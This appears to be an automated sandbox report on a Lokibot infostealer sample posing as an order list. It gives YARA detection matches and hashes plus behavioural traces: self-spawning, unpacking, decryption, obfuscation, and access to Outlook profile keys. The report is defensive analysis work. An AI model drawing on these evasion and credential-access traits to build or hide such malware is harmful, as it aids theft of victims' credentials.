Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EC214
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EEBA8
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EEBB8

Source: ORDER LIST790.exe, 00000000.00000002.278553985.0000000007D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.278832560.0000000007E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.278857766.0000000007F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.273358905.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000003.260912699.0000000007C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000000.235829681.0000000000F86000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.271014354.0000000001650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ORDER LIST790.exe
Source: ORDER LIST790.exe	Binary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe

Source: ORDER LIST790.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\ORDER LIST790.exe "C:\Users\user\Desktop\ORDER LIST790.exe"
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER LIST790.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1

Source: ORDER LIST790.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: ORDER LIST790.exe, Main.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Source: ORDER LIST790.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER LIST790.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR

.NET source code contains potential unpacker

Source: ORDER LIST790.exe, Main.cs	.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.cs	.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Code function: 0_2_05865CF8 push eax; mov dword ptr [esp], ecx

Source: initial sample

Static PE information: section name: .text entropy: 7.320980599570163

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
